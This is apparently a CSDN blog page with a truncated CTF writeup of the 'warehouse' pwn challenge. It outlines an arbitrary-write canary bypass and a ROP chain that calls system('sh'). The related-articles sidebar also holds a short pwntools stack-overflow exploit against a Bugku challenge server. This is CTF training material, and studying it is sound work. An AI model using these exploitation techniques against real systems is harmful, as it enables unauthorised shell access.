CTF writeup之pwn2own warehouse

最新推荐文章于 2024-08-21 17:00:00 发布
最新推荐文章于 2024-08-21 17:00:00 发布
阅读量677 收藏
点赞数 1
分类专栏: ctf writeup pwn 文章标签: ctf writeup pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenzhenyu1983/article/details/78618872
版权
本文介绍了参与CTF比赛时遇到的一道PWN题——pwn2own warehouse的解决过程。通过分析题目功能,发现可以利用store函数实现任意地址写,绕过canary保护,构建ROP链调用system("sh")获取shell。在详细步骤中,作者阐述了如何构造POP gadget,以及在没有常规leak手段下,如何利用特殊gadget找到system地址。最后总结了本次挑战的三个关键收获,包括控制EIP的技巧、寻找替代leak方法以及可写地址的利用。
摘要由CSDN通过智能技术生成

近来练习CTF,主要是PWN,有点小心得。分享一系列的writeup。

这题是pwn2own的一道pwn题--warehous。

一、题目分析

elf文件打开了NX和canary。


分析一下题目功能




题目还是比较简单的。在main函数里能调用store函数,并实现任意地址写。即可以跳过canary覆盖返回地址。并实现ROP。最终调用system("sh")得到shell。

二、ROP构造

1、储存“sh”字符串

2、计算并跳到system地址


最低0.47元/天 解锁文章
retme
关注
专栏目录
《从CTFPwn2Own》(2).pdf
08-24
《从CTFPwn2Own》(2)
Pwn2Own 2023多伦多大赛目标和奖金发布
smellycat000的专栏
07-14 660
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士2023年 Pwn2Own 大赛将于10月24至27日在趋势科技多伦多代表处举行。本次大赛仍然可远程参赛且会向现场参赛的前几届大会的获胜者们补贴最高3000美元的差旅费。大赛将接待一定数量的希望到场并观摩大赛的与会人员。选择远程参赛的人员的报名截止日期同样是10月19日,需要提交参赛目标、完整解释利用链的详细白皮书以及在注册期间结束时提供如何运行...
自学网络安全?一般人我还是劝你算了吧
BlueSocks152的博客
01-07 331
本人8年网络安全经验,在学网络安全之前对电脑的认知也就只限于上个网,玩个办公软件。这里不能跑,我为啥说:自学网络安全,一般人我还是劝你算了吧?因为我就是那个一般人!网络安全基础真的很简单,是个人稍微认真点都能懂,这就是好多人说网络安全简单、易懂、好学,然后就是一顿浮夸的言论,误导那些小白,这里我就给那些轻浮的人泼一桶冷水,懂和学会是一码事吗?
网络安全领域含金量最高的5大赛事,每个网安人的梦!
2401_85026116的博客
08-21 432
做网络安全一定要知道的5大赛事,含金量贼高,如果你能拿奖,国内大厂随你挑,几乎是每个有志网安人的梦!这些比赛不仅提供了一个展示和测试技能的平台,还有机会与来自全球的顶级安全专家交流和学习。参加这些赛事可以提高网络安全技能,并在行业中建立声誉。参加比赛对技术要求很高,我自己也参加很多CTF比赛,总结出来了很多赛事经验,可以给大家分享。最后给大家附上我自己整理的网安最新最全的学习路线图,具体细分的技术都已明确写出:网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知
网络安全最出名的5大赛事,含金量贼高,每个网安人的梦!
logic1001的博客
08-22 4202
可以不参加,但不能不知道
谷歌修复 Pwn2Own 2024大赛发现的两个 Chrome 0day
smellycat000的专栏
03-28 230
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,谷歌修复了 Chrome web浏览器中的7个漏洞,其中两个是在 Pwn2Own 2024温哥华大赛中发现。第一个0day是 CVE-2024-2887,是位于开放标准 WebAssembly 中的一个高危类型混淆漏洞。Manfred Paul 在大赛第一天演示了这个漏洞,通过构造的HTML页面即可用作双击远程代码执行 (RCE) 利用的...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 320
[Bugku CTF——Pwn] pwn2 目地址:https://ctf.bugku.com/ 额,好久不写这么简单的目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
《从CTFPwn2Own》(1).pdf
08-24
《从CTFPwn2Own》(1)
《从CTFPwn2Own》(3).pdf
最新发布
08-24
《从CTFPwn2Own》(3)
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
ctfctf-pwn收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
首届Pwn2Own 汽车大赛目标和奖金公布
smellycat000的专栏
08-30 142
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士ZDI将在2024年1月24日至26日日本东京举行的全球汽车大会上,主持首届专注于汽车系统的 Pwn2Own 大赛。ZDI 在今天宣布了大赛目标和奖金。大赛的三大主要目标包括:1、提供鼓励汽车研究的场所。研究人员可提交针对多种产品和平台的漏洞报告并获得经济奖励。2、激励厂商参与安全研究社区。链接全球的安全研究人员社区与汽车厂商,改进汽车安全性和弹...
Pwn2Own 2023多伦多大赛落幕 Master of Pwn诞生
smellycat000的专栏
10-30 384
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士为期四天的Pwn2Own 多伦多2023大赛落下帷幕,Viettel 团队以18万美元的赏金和30个积分点获得 Master of Pwn大赛冠军。大赛共向发现58个唯一 0day 的研究团队发放共计近104万 (1038500) 美元的赏金。本文是对每天的比赛情况的编译。大赛目标和奖金可点击了解:Pwn2Own 2023多伦多大赛目标和奖金发布...
BugKu - pwn2
Casuall的博客
07-06 3686
这道来自于bugku旧平台的第二道pwn,还是比较简单的,一个典型的缓冲区溢出。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
Pwn2Own 2024温哥华大赛目标和奖金公布
smellycat000的专栏
01-18 484
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士ZDI 指出,2024年的 Pwn2Own 大赛将于2024年3月20日至22日在温哥华 CanSecWest 举行。本次大赛共分8个类别,并将简化“汽车”类别并新增“云原生/容器”类别。本次大赛的总奖金池超过100万美元,合作伙伴是特斯拉。“汽车”类别将取消多层级目标,仅关注漏洞影响和在车辆目标组件中实现代码执行情况。对于某些目标而言,需要在多...
Pwn2Own 2024温哥华大赛落幕 Master of Pwn 诞生
smellycat000的专栏
03-25 478
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士为期两天的Pwn2Own 温哥华2024年大赛落下帷幕。大赛共发现29个唯一0day,颁发赏金1132500美元,Master of Pwn 的桂冠由 Manfred Paul 以202500美元的赏金25个积分点摘得。参与厂商将有90天的时间来修复这些漏洞。大赛目标和奖金介绍可见:Pwn2Own 2024温哥华大赛目标和奖金公布第一天赛况战果战...
Pwn2Own黑客大赛:发现特斯拉、微软、Ubuntu漏洞
weixin_39915649的博客
04-14 198
在此次的黑客大赛上,参赛队伍发现了Microsoft、Oracle 、Mozilla Firefox、Ubuntup、Apple Safari、Telsa中存在的漏洞问
pwn2own
weixin_34367257的博客
04-04 1081
Pwn2Own是全球最著名的黑客大赛之一,由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助,今年已经是第六届。 1比赛规则 参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari,平台是在安装安全更新的Windows 7操作系统下运行,Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作,顺利攻破一个主流浏览器便...
ctf.bugku ctf目详解——pwn2
yeshen4328的专栏
05-26 1180
ctf.bugku ctf目详解——pwn2 目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
ctf pwn 计算器
10-05
引用是一段代码,它使用了Python的pwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn攻击是一个相对较难的领域。 对于你提到的"计算器",如果你是指CTF中的pwn目中的一个计算器程序,那么你需要先进行程序的分析,找到可能存在的漏洞点。一旦找到漏洞点,你可以通过构造特定输入来利用漏洞,从而获取权限。 在学习CTF pwn攻击时,首先要有扎实的基础知识,包括C语言、汇编语言、Python编程、操作系统原理和Linux操作等方面的知识。这些基础知识将为你提供分析和理解程序的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值